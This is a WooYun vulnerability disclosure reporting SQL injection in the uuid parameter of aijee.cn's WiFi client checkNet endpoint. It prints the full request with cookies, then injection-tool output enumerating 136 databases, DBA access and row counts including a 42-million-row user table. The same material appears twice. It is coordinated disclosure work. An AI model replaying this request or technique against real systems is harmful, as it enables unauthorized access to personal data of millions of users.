当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196990

漏洞标题:WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

相关厂商:aijee.cn

漏洞作者: 头晕脑壳疼

提交时间:2016-04-20 13:15

修复时间:2016-06-06 11:10

公开时间:2016-06-06 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

菜鸟挖洞洞不容易,有木有小礼品奖励下

详细说明:

POST /CApp1_3_5/checkNet HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Host: p.aijee.cn
Connection: close
User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
Cookie: PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940
Cookie2: $Version=1
Accept-Encoding: gzip
uuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a


参数uuid存在注入

1.png


available databases [136]:
[*] asbeta
[*] authserver
[*] information_schema
[*] mysql
[*] rdsh
[*] rdsh2
[*] rdsh2bak
[*] rdsh_akesudiqu
[*] rdsh_aletaidiqu
[*] rdsh_anshan
[*] rdsh_baicheng
[*] rdsh_baishan
[*] rdsh_baiyin
[*] rdsh_baoding
[*] rdsh_baotou
[*] rdsh_bayannaoer
[*] rdsh_beijing
[*] rdsh_benxi
[*] rdsh_binzhou
[*] rdsh_cangzhou
[*] rdsh_changchun
[*] rdsh_changzhi
[*] rdsh_chaoyang
[*] rdsh_chengde
[*] rdsh_chifeng
[*] rdsh_chongzuo
[*] rdsh_dalian
[*] rdsh_dandong
[*] rdsh_daqing
[*] rdsh_datong
[*] rdsh_dezhou
[*] rdsh_dingxi
[*] rdsh_dongying
[*] rdsh_fangchenggang
[*] rdsh_fushun
[*] rdsh_fuxin
[*] rdsh_guigang
[*] rdsh_guilin
[*] rdsh_guyuan
[*] rdsh_haerbin
[*] rdsh_hamidiqu
[*] rdsh_handan
[*] rdsh_hegang
[*] rdsh_heihe
[*] rdsh_hengshui
[*] rdsh_hetiandiqu
[*] rdsh_heze
[*] rdsh_hezhou
[*] rdsh_huhehaote
[*] rdsh_huludao
[*] rdsh_hulunbeier
[*] rdsh_jiamusi
[*] rdsh_jiayuguan
[*] rdsh_jilin
[*] rdsh_jinan
[*] rdsh_jinchang
[*] rdsh_jincheng
[*] rdsh_jining
[*] rdsh_jinzhong
[*] rdsh_jinzhou
[*] rdsh_jiuquan
[*] rdsh_jixi
[*] rdsh_kashidiqu
[*] rdsh_kelamayi
[*] rdsh_laibin
[*] rdsh_laiwu
[*] rdsh_langfang
[*] rdsh_lanzhou
[*] rdsh_liaocheng
[*] rdsh_liaoyang
[*] rdsh_liaoyuan
[*] rdsh_linfen
[*] rdsh_linyi
[*] rdsh_log
[*] rdsh_longnan
[*] rdsh_lvliang
[*] rdsh_mudanjiang
[*] rdsh_panjin
[*] rdsh_pay
[*] rdsh_pingliang
[*] rdsh_putian
[*] rdsh_qingdao
[*] rdsh_qingyang
[*] rdsh_qinhuangdao
[*] rdsh_qinzhou
[*] rdsh_qiqihaer
[*] rdsh_qitaihe
[*] rdsh_rizhao
[*] rdsh_sanming
[*] rdsh_shenyang
[*] rdsh_shijiazhuang
[*] rdsh_shizuishan
[*] rdsh_shuangyashan
[*] rdsh_shuozhou
[*] rdsh_siping
[*] rdsh_songyuan
[*] rdsh_suihua
[*] rdsh_tachengdiqu
[*] rdsh_taian
[*] rdsh_taiyuan
[*] rdsh_tangshan
[*] rdsh_tianjin
[*] rdsh_tianshui
[*] rdsh_tieling
[*] rdsh_tonghua
[*] rdsh_tongliao
[*] rdsh_tulufandiqu
[*] rdsh_weifang
[*] rdsh_weihai
[*] rdsh_wuhai
[*] rdsh_wulanchabu
[*] rdsh_wulumuqi
[*] rdsh_wuwei
[*] rdsh_wuzhong
[*] rdsh_wuzhou
[*] rdsh_xinganmeng
[*] rdsh_xingtai
[*] rdsh_xining
[*] rdsh_xinzhou
[*] rdsh_yangquan
[*] rdsh_yantai
[*] rdsh_yichun
[*] rdsh_yinchuan
[*] rdsh_yingkou
[*] rdsh_yulin
[*] rdsh_yuncheng
[*] rdsh_zaozhuang
[*] rdsh_zhangjiakou
[*] rdsh_zhangye
[*] rdsh_zhongwei
[*] rdsh_zhou
[*] rdsh_zibo
[*] rdshbak
[*] rdshtest
[*] root
[*] test


DBA权限

2.png


有两个user的表
千万用户

+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| rdsh_wm_user | 42644005 |
| rdsh_push_log_postion | 6425031 |
| rdsh_coupon_mt_role | 4777601 |
| rdsh_app_count | 3783171 |
| rdsh_coupon_mt | 2081793 |
| rdsh_wm_router | 1980000 |
| rdsh_wm_business_day | 1848251 |
| rdsh_wm_business | 1811110 |
| rdsh_router_warning | 1274784 |
| rdsh_coupon_nm_shop | 1157876 |
| rdsh_portallog | 1023002 |
| rdsh_user | 860361 |
| rdsh_coupon_mt_shop | 836490 |
| rdsh_coupon_nm_shop_bak | 640520 |
| rdsh_push_current_postion | 614973 |
| rdsh_smsinterfacelog | 559888 |
| rdsh_wifi_speed_log | 519264 |
| rdsh_imagelib | 428069 |
| rdsh_business_dp | 384370 |
| rdsh_business_status | 384370 |
| rdsh_deal_business | 378170 |
| rdsh_deal_image_more | 373569 |
| rdsh_coupon_nm_role_bak | 341461 |
| rdsh_deal | 292367 |
| rdsh_coupon_nm_role | 262659 |
| rdsh_business1 | 248561 |
| rdsh_image | 247861 |
| applog | 239581 |
| rdsh_coupon_nm | 239514 |
| rdsh_deal_restriction | 239200 |
| rdsh_wificonf | 221395 |
| rdsh_business_fans | 206737 |
| rdsh_coupon_nm_role_his | 190375 |
| rdsh_wifi_android_log | 183767 |
| rdsh_special_subject_log | 168739 |
| rdsh_sign | 142881 |
| rdsh_fans_count | 135971 |
| rdsh_wx_unionid | 127687 |
| tomato_report_log | 126725 |
| rdsh_business_wifi | 123853 |
| rdsh_coupon_nm_bak | 119984 |
| rdsh_setting | 107414 |
| rdsh_business_account | 106680 |
| rdsh_slide_business | 105832 |
| rdsh_merchant | 102423 |
| rdsh_business | 101440 |
| rdsh_push_log | 90398 |
| rdsh_ad_capp_home_log | 88939 |
| rdsh_agent_business | 80773 |
| rdsh_wifiscanlog | 78198 |
| rdsh_ce | 75011 |
| rdsh_coupon_count | 66450 |
| rdsh_send_push_log | 65507 |
| rdsh_business_wifi_audit_user | 60664 |
| rdsh_business_qrlog | 60012 |
| rdsh_business_coupon_fans | 50462 |
| rdsh_tongji | 44382 |
| rdsh_day_static | 37999 |
| rdsh_business_fans_dd_count | 35808 |
| rdsh_mall_business | 30854 |
| rdsh_coupon_mt_role_his | 30314 |
| rdsh_accounttable | 22626 |
| rdsh_business_dp_goods | 22574 |
| rdsh_business_static | 22521 |
| rdsh_accountrel | 21422 |
| rdsh_accountlog | 17583 |
| rdsh_goods_img | 15506 |
| rdsh_goodsprice | 15377 |
| rdsh_goods | 15259 |
| rdsh_classes_goods_business | 15030 |
| rdsh_business_wifi_shield | 11981 |
| rdsh_business_dp_img | 11287 |
| rdsh_business_instore_promotion | 11157 |
| rdsh_coupon_mt_his | 10000 |
| rdsh_coupon_nm_his | 10000 |
| rdsh_business_wifi_pwd_error | 7497 |
| rdsh_onlinebill | 7399 |
| rdsh_business_cloudstore_realname | 7236 |
| rdsh_goods_show | 6495 |
| rdsh_neighborhood | 6064 |
| rdsh_channel | 5808 |
| rdsh_business_coupon | 5154 |
| rdsh_user_wxqrcode | 4559 |
| rdsh_business_wifi_copy4 | 4554 |
| rdsh_classes | 4338 |
| rdsh_user2 | 4319 |
| rdsh_column_business | 4182 |
| rdsh_user_sharepoint | 4180 |
| rdsh_goods_browse_log | 4000 |
| rdsh_dp_count | 3516 |
| rdsh_district1 | 3446 |
| rdsh_business_shorturl | 3187 |
| rdsh_trace_log | 3141 |
| rdsh_district | 3092 |
| rdsh_userfeedback | 2931 |
| rdsh_business_wifi_audit | 2910 |
| rdsh_business_guest | 2876 |
| rdsh_promotion_partake | 2699 |
| rdsh_business_service | 2674 |
| rdsh_promotion_collect | 2652 |
| rdsh_sms | 2434 |
| rdsh_contract | 2287 |
| rdsh_image_txt_business | 1889 |
| rdsh_trade_static | 1848 |
| rdsh_special_subject_products | 1827 |
| rdsh_app_version | 1803 |
| rdsh_tm_goods | 1627 |
| rdsh_router | 1574 |
| rdsh_business_giftresult | 1545 |
| rdsh_visit_business | 1218 |
| rdsh_review | 1164 |
| rdsh_ordertreatlog | 1085 |
| rdsh_business_vip | 1050 |
| rdsh_call_business | 973 |
| rdsh_business_nearpush | 896 |
| rdsh_download_app | 896 |
| rdshb_contract | 841 |
| rdsh_business_offer | 805 |
| rdsh_agent_users | 779 |
| rdsh_platuser_role | 762 |
| rdsh_bankcard_bin | 725 |
| rdsh_ibeacon | 681 |
| rdsh_orderitems | 647 |
| rdsh_goodsdaystatic | 642 |
| rdsh_wxshake | 604 |
| rdsh_category_b | 598 |
| rdsh_dt_count | 505 |
| rdsh_plat_user | 490 |
| rdsh_portal_count | 479 |
| rdsh_device_count | 477 |
| rdsh_review_business | 440 |
| rdsh_business_cloudstore | 426 |
| rdsh_aijee_area | 424 |
| rdsh_business_black_white_mac | 423 |
| rdsh_business_fans_privilege | 405 |
| rdsh_citys_yd | 387 |
| rdsh_system_message | 386 |
| rdsh_system_message_status | 386 |
| rdsh_service_business | 380 |
| rdsh_platform_order | 372 |
| rdsh_city | 360 |
| rdsh_ordertable | 359 |
| tomato_report | 337 |
| rdsh_server_finance_status | 334 |
| rdsh_orderpost | 307 |
| rdsh_wxshake_url | 282 |
| rdsh_business_opener_sub | 279 |
| rdsh_category_mx | 278 |
| rdsh_business_opener | 267 |
| rdsh_special_subject | 256 |
| rdsh_business_fav | 255 |
| rdsh_stat_day_activity_register | 255 |
| rdsh_stat_day_au | 255 |
| rdsh_stat_day_retention_rate | 255 |
| rdsh_stat_day_start_up_time_used | 255 |
| rdsh_transaction_pay_log | 253 |
| rdsh_work_order | 250 |
| rdsh_business_msg | 221 |
| rdsh_special_subject_comment | 200 |
| rdsh_router_cancellog | 197 |
| rdsh_reviews_business | 185 |
| rdsh_user_habit | 185 |
| rdsh_cash_apply | 145 |
| rdsh_promotion_comment | 138 |
| rdsh_cash_job | 119 |
| rdsh_offlinepos | 114 |
| rdsh_business_wifi_bak | 111 |
| rdsh_joinus_apply | 110 |
| rdsh_paper_withdraw | 107 |
| rdsh_promotion | 107 |
| rdsh_agent | 106 |
| rdsh_feedback | 101 |
| rdsh_receive_gift | 95 |
| rdsh_shopping_cart | 92 |
| rdsh_business_bank | 90 |
| `temporary` | 88 |
| rdsh_member_address | 87 |
| rdsh_goodsold | 86 |
| rdsh_business_bank_list | 82 |
| rdsh_wifi_business_auto | 81 |
| rdsh_voucher | 66 |
| rdsh_special_subject_praise | 52 |
| rdsh_buy_agent_goods | 48 |
| rdsh_category_c | 42 |
| rdsh_crontab | 38 |
| rdsh_log_ceshi | 38 |
| rdsh_router_conf | 37 |
| rdsh_stat_week_au | 37 |
| rdsh_stat_week_retention_rate | 37 |
| rdsh_app_ad | 35 |
| rdsh_coupon_business | 35 |
| rdsh_province | 35 |
| rdsh_discount_info | 32 |
| rdsh_slide | 29 |
| rdsh_column | 26 |
| rdsh_jd_goods | 26 |
| rdsh_wechat_menu | 26 |
| rdsh_user_card | 24 |
| rdsh_voucher_user | 22 |
| rdsh_business_review | 21 |
| rdsh_aijee_msg | 20 |
| rdsh_platrole | 16 |
| rdsh_wifiscan | 14 |
| rdsh_pad | 13 |
| rdsh_category_a | 12 |
| rdsh_paper | 11 |
| rdsh_report | 10 |
| rdsh_business_contacts | 9 |
| rdsh_ordercomplaint_img | 9 |
| rdsh_stat_month_au | 9 |
| rdsh_wechat_word | 9 |
| rdsh_business_ddsms | 8 |
| rdsh_stat_month_retention_rate | 8 |
| rdsh_vocational_img | 8 |
| rdsh_wechat_sub | 7 |
| rdsh_business_weixin_account | 6 |
| rdsh_image_txt | 6 |
| rdsh_wechat_def | 6 |
| rdsh_gift | 5 |
| rdsh_paper_probability | 5 |
| rdsh_sms_interface | 5 |
| rdsh_wechat_img | 5 |
| rdsh_message_moban | 4 |
| rdsh_ordercomplaint | 4 |
| rdsh_smsjoblog | 4 |
| rdsh_voucher_moban | 4 |
| rdsh_acctool | 3 |
| rdsh_agent_user | 3 |
| rdsh_business_area_voucher | 3 |
| rdsh_business_role | 3 |
| rdsh_cam | 3 |
| rdsh_userfeedbackreply | 3 |
| rdsh_business_msg_rules | 2 |
| rdsh_userfeedbackreply_moban | 2 |
| rdsh_agent_role | 1 |
| rdsh_app_ad_customer | 1 |
| rdsh_business_coupon_push | 1 |
| rdsh_business_scene | 1 |
| rdsh_paper_set | 1 |
| rdsh_pos | 1 |
| rdsh_sys_conf | 1 |
+-----------------------------------+---------+


漏洞证明:

POST /CApp1_3_5/checkNet HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Host: p.aijee.cn
Connection: close
User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
Cookie: PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940
Cookie2: $Version=1
Accept-Encoding: gzip
uuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a


参数uuid存在注入

1.png


available databases [136]:
[*] asbeta
[*] authserver
[*] information_schema
[*] mysql
[*] rdsh
[*] rdsh2
[*] rdsh2bak
[*] rdsh_akesudiqu
[*] rdsh_aletaidiqu
[*] rdsh_anshan
[*] rdsh_baicheng
[*] rdsh_baishan
[*] rdsh_baiyin
[*] rdsh_baoding
[*] rdsh_baotou
[*] rdsh_bayannaoer
[*] rdsh_beijing
[*] rdsh_benxi
[*] rdsh_binzhou
[*] rdsh_cangzhou
[*] rdsh_changchun
[*] rdsh_changzhi
[*] rdsh_chaoyang
[*] rdsh_chengde
[*] rdsh_chifeng
[*] rdsh_chongzuo
[*] rdsh_dalian
[*] rdsh_dandong
[*] rdsh_daqing
[*] rdsh_datong
[*] rdsh_dezhou
[*] rdsh_dingxi
[*] rdsh_dongying
[*] rdsh_fangchenggang
[*] rdsh_fushun
[*] rdsh_fuxin
[*] rdsh_guigang
[*] rdsh_guilin
[*] rdsh_guyuan
[*] rdsh_haerbin
[*] rdsh_hamidiqu
[*] rdsh_handan
[*] rdsh_hegang
[*] rdsh_heihe
[*] rdsh_hengshui
[*] rdsh_hetiandiqu
[*] rdsh_heze
[*] rdsh_hezhou
[*] rdsh_huhehaote
[*] rdsh_huludao
[*] rdsh_hulunbeier
[*] rdsh_jiamusi
[*] rdsh_jiayuguan
[*] rdsh_jilin
[*] rdsh_jinan
[*] rdsh_jinchang
[*] rdsh_jincheng
[*] rdsh_jining
[*] rdsh_jinzhong
[*] rdsh_jinzhou
[*] rdsh_jiuquan
[*] rdsh_jixi
[*] rdsh_kashidiqu
[*] rdsh_kelamayi
[*] rdsh_laibin
[*] rdsh_laiwu
[*] rdsh_langfang
[*] rdsh_lanzhou
[*] rdsh_liaocheng
[*] rdsh_liaoyang
[*] rdsh_liaoyuan
[*] rdsh_linfen
[*] rdsh_linyi
[*] rdsh_log
[*] rdsh_longnan
[*] rdsh_lvliang
[*] rdsh_mudanjiang
[*] rdsh_panjin
[*] rdsh_pay
[*] rdsh_pingliang
[*] rdsh_putian
[*] rdsh_qingdao
[*] rdsh_qingyang
[*] rdsh_qinhuangdao
[*] rdsh_qinzhou
[*] rdsh_qiqihaer
[*] rdsh_qitaihe
[*] rdsh_rizhao
[*] rdsh_sanming
[*] rdsh_shenyang
[*] rdsh_shijiazhuang
[*] rdsh_shizuishan
[*] rdsh_shuangyashan
[*] rdsh_shuozhou
[*] rdsh_siping
[*] rdsh_songyuan
[*] rdsh_suihua
[*] rdsh_tachengdiqu
[*] rdsh_taian
[*] rdsh_taiyuan
[*] rdsh_tangshan
[*] rdsh_tianjin
[*] rdsh_tianshui
[*] rdsh_tieling
[*] rdsh_tonghua
[*] rdsh_tongliao
[*] rdsh_tulufandiqu
[*] rdsh_weifang
[*] rdsh_weihai
[*] rdsh_wuhai
[*] rdsh_wulanchabu
[*] rdsh_wulumuqi
[*] rdsh_wuwei
[*] rdsh_wuzhong
[*] rdsh_wuzhou
[*] rdsh_xinganmeng
[*] rdsh_xingtai
[*] rdsh_xining
[*] rdsh_xinzhou
[*] rdsh_yangquan
[*] rdsh_yantai
[*] rdsh_yichun
[*] rdsh_yinchuan
[*] rdsh_yingkou
[*] rdsh_yulin
[*] rdsh_yuncheng
[*] rdsh_zaozhuang
[*] rdsh_zhangjiakou
[*] rdsh_zhangye
[*] rdsh_zhongwei
[*] rdsh_zhou
[*] rdsh_zibo
[*] rdshbak
[*] rdshtest
[*] root
[*] test


DBA权限

2.png


+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| rdsh_wm_user | 42644005 |
| rdsh_push_log_postion | 6425031 |
| rdsh_coupon_mt_role | 4777601 |
| rdsh_app_count | 3783171 |
| rdsh_coupon_mt | 2081793 |
| rdsh_wm_router | 1980000 |
| rdsh_wm_business_day | 1848251 |
| rdsh_wm_business | 1811110 |
| rdsh_router_warning | 1274784 |
| rdsh_coupon_nm_shop | 1157876 |
| rdsh_portallog | 1023002 |
| rdsh_user | 860361 |
| rdsh_coupon_mt_shop | 836490 |
| rdsh_coupon_nm_shop_bak | 640520 |
| rdsh_push_current_postion | 614973 |
| rdsh_smsinterfacelog | 559888 |
| rdsh_wifi_speed_log | 519264 |
| rdsh_imagelib | 428069 |
| rdsh_business_dp | 384370 |
| rdsh_business_status | 384370 |
| rdsh_deal_business | 378170 |
| rdsh_deal_image_more | 373569 |
| rdsh_coupon_nm_role_bak | 341461 |
| rdsh_deal | 292367 |
| rdsh_coupon_nm_role | 262659 |
| rdsh_business1 | 248561 |
| rdsh_image | 247861 |
| applog | 239581 |
| rdsh_coupon_nm | 239514 |
| rdsh_deal_restriction | 239200 |
| rdsh_wificonf | 221395 |
| rdsh_business_fans | 206737 |
| rdsh_coupon_nm_role_his | 190375 |
| rdsh_wifi_android_log | 183767 |
| rdsh_special_subject_log | 168739 |
| rdsh_sign | 142881 |
| rdsh_fans_count | 135971 |
| rdsh_wx_unionid | 127687 |
| tomato_report_log | 126725 |
| rdsh_business_wifi | 123853 |
| rdsh_coupon_nm_bak | 119984 |
| rdsh_setting | 107414 |
| rdsh_business_account | 106680 |
| rdsh_slide_business | 105832 |
| rdsh_merchant | 102423 |
| rdsh_business | 101440 |
| rdsh_push_log | 90398 |
| rdsh_ad_capp_home_log | 88939 |
| rdsh_agent_business | 80773 |
| rdsh_wifiscanlog | 78198 |
| rdsh_ce | 75011 |
| rdsh_coupon_count | 66450 |
| rdsh_send_push_log | 65507 |
| rdsh_business_wifi_audit_user | 60664 |
| rdsh_business_qrlog | 60012 |
| rdsh_business_coupon_fans | 50462 |
| rdsh_tongji | 44382 |
| rdsh_day_static | 37999 |
| rdsh_business_fans_dd_count | 35808 |
| rdsh_mall_business | 30854 |
| rdsh_coupon_mt_role_his | 30314 |
| rdsh_accounttable | 22626 |
| rdsh_business_dp_goods | 22574 |
| rdsh_business_static | 22521 |
| rdsh_accountrel | 21422 |
| rdsh_accountlog | 17583 |
| rdsh_goods_img | 15506 |
| rdsh_goodsprice | 15377 |
| rdsh_goods | 15259 |
| rdsh_classes_goods_business | 15030 |
| rdsh_business_wifi_shield | 11981 |
| rdsh_business_dp_img | 11287 |
| rdsh_business_instore_promotion | 11157 |
| rdsh_coupon_mt_his | 10000 |
| rdsh_coupon_nm_his | 10000 |
| rdsh_business_wifi_pwd_error | 7497 |
| rdsh_onlinebill | 7399 |
| rdsh_business_cloudstore_realname | 7236 |
| rdsh_goods_show | 6495 |
| rdsh_neighborhood | 6064 |
| rdsh_channel | 5808 |
| rdsh_business_coupon | 5154 |
| rdsh_user_wxqrcode | 4559 |
| rdsh_business_wifi_copy4 | 4554 |
| rdsh_classes | 4338 |
| rdsh_user2 | 4319 |
| rdsh_column_business | 4182 |
| rdsh_user_sharepoint | 4180 |
| rdsh_goods_browse_log | 4000 |
| rdsh_dp_count | 3516 |
| rdsh_district1 | 3446 |
| rdsh_business_shorturl | 3187 |
| rdsh_trace_log | 3141 |
| rdsh_district | 3092 |
| rdsh_userfeedback | 2931 |
| rdsh_business_wifi_audit | 2910 |
| rdsh_business_guest | 2876 |
| rdsh_promotion_partake | 2699 |
| rdsh_business_service | 2674 |
| rdsh_promotion_collect | 2652 |
| rdsh_sms | 2434 |
| rdsh_contract | 2287 |
| rdsh_image_txt_business | 1889 |
| rdsh_trade_static | 1848 |
| rdsh_special_subject_products | 1827 |
| rdsh_app_version | 1803 |
| rdsh_tm_goods | 1627 |
| rdsh_router | 1574 |
| rdsh_business_giftresult | 1545 |
| rdsh_visit_business | 1218 |
| rdsh_review | 1164 |
| rdsh_ordertreatlog | 1085 |
| rdsh_business_vip | 1050 |
| rdsh_call_business | 973 |
| rdsh_business_nearpush | 896 |
| rdsh_download_app | 896 |
| rdshb_contract | 841 |
| rdsh_business_offer | 805 |
| rdsh_agent_users | 779 |
| rdsh_platuser_role | 762 |
| rdsh_bankcard_bin | 725 |
| rdsh_ibeacon | 681 |
| rdsh_orderitems | 647 |
| rdsh_goodsdaystatic | 642 |
| rdsh_wxshake | 604 |
| rdsh_category_b | 598 |
| rdsh_dt_count | 505 |
| rdsh_plat_user | 490 |
| rdsh_portal_count | 479 |
| rdsh_device_count | 477 |
| rdsh_review_business | 440 |
| rdsh_business_cloudstore | 426 |
| rdsh_aijee_area | 424 |
| rdsh_business_black_white_mac | 423 |
| rdsh_business_fans_privilege | 405 |
| rdsh_citys_yd | 387 |
| rdsh_system_message | 386 |
| rdsh_system_message_status | 386 |
| rdsh_service_business | 380 |
| rdsh_platform_order | 372 |
| rdsh_city | 360 |
| rdsh_ordertable | 359 |
| tomato_report | 337 |
| rdsh_server_finance_status | 334 |
| rdsh_orderpost | 307 |
| rdsh_wxshake_url | 282 |
| rdsh_business_opener_sub | 279 |
| rdsh_category_mx | 278 |
| rdsh_business_opener | 267 |
| rdsh_special_subject | 256 |
| rdsh_business_fav | 255 |
| rdsh_stat_day_activity_register | 255 |
| rdsh_stat_day_au | 255 |
| rdsh_stat_day_retention_rate | 255 |
| rdsh_stat_day_start_up_time_used | 255 |
| rdsh_transaction_pay_log | 253 |
| rdsh_work_order | 250 |
| rdsh_business_msg | 221 |
| rdsh_special_subject_comment | 200 |
| rdsh_router_cancellog | 197 |
| rdsh_reviews_business | 185 |
| rdsh_user_habit | 185 |
| rdsh_cash_apply | 145 |
| rdsh_promotion_comment | 138 |
| rdsh_cash_job | 119 |
| rdsh_offlinepos | 114 |
| rdsh_business_wifi_bak | 111 |
| rdsh_joinus_apply | 110 |
| rdsh_paper_withdraw | 107 |
| rdsh_promotion | 107 |
| rdsh_agent | 106 |
| rdsh_feedback | 101 |
| rdsh_receive_gift | 95 |
| rdsh_shopping_cart | 92 |
| rdsh_business_bank | 90 |
| `temporary` | 88 |
| rdsh_member_address | 87 |
| rdsh_goodsold | 86 |
| rdsh_business_bank_list | 82 |
| rdsh_wifi_business_auto | 81 |
| rdsh_voucher | 66 |
| rdsh_special_subject_praise | 52 |
| rdsh_buy_agent_goods | 48 |
| rdsh_category_c | 42 |
| rdsh_crontab | 38 |
| rdsh_log_ceshi | 38 |
| rdsh_router_conf | 37 |
| rdsh_stat_week_au | 37 |
| rdsh_stat_week_retention_rate | 37 |
| rdsh_app_ad | 35 |
| rdsh_coupon_business | 35 |
| rdsh_province | 35 |
| rdsh_discount_info | 32 |
| rdsh_slide | 29 |
| rdsh_column | 26 |
| rdsh_jd_goods | 26 |
| rdsh_wechat_menu | 26 |
| rdsh_user_card | 24 |
| rdsh_voucher_user | 22 |
| rdsh_business_review | 21 |
| rdsh_aijee_msg | 20 |
| rdsh_platrole | 16 |
| rdsh_wifiscan | 14 |
| rdsh_pad | 13 |
| rdsh_category_a | 12 |
| rdsh_paper | 11 |
| rdsh_report | 10 |
| rdsh_business_contacts | 9 |
| rdsh_ordercomplaint_img | 9 |
| rdsh_stat_month_au | 9 |
| rdsh_wechat_word | 9 |
| rdsh_business_ddsms | 8 |
| rdsh_stat_month_retention_rate | 8 |
| rdsh_vocational_img | 8 |
| rdsh_wechat_sub | 7 |
| rdsh_business_weixin_account | 6 |
| rdsh_image_txt | 6 |
| rdsh_wechat_def | 6 |
| rdsh_gift | 5 |
| rdsh_paper_probability | 5 |
| rdsh_sms_interface | 5 |
| rdsh_wechat_img | 5 |
| rdsh_message_moban | 4 |
| rdsh_ordercomplaint | 4 |
| rdsh_smsjoblog | 4 |
| rdsh_voucher_moban | 4 |
| rdsh_acctool | 3 |
| rdsh_agent_user | 3 |
| rdsh_business_area_voucher | 3 |
| rdsh_business_role | 3 |
| rdsh_cam | 3 |
| rdsh_userfeedbackreply | 3 |
| rdsh_business_msg_rules | 2 |
| rdsh_userfeedbackreply_moban | 2 |
| rdsh_agent_role | 1 |
| rdsh_app_ad_customer | 1 |
| rdsh_business_coupon_push | 1 |
| rdsh_business_scene | 1 |
| rdsh_paper_set | 1 |
| rdsh_pos | 1 |
| rdsh_sys_conf | 1 |
+-----------------------------------+---------+

修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-04-22 11:07

厂商回复:

目前正在处理,非常感谢@头晕脑壳疼

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-16 14:07 | prolog ( 普通白帽子 | Rank:841 漏洞数:177 )

    66666

  2. 2016-04-20 15:59 | px1624 ( 普通白帽子 | Rank:1137 漏洞数:200 | px1624)

    叼~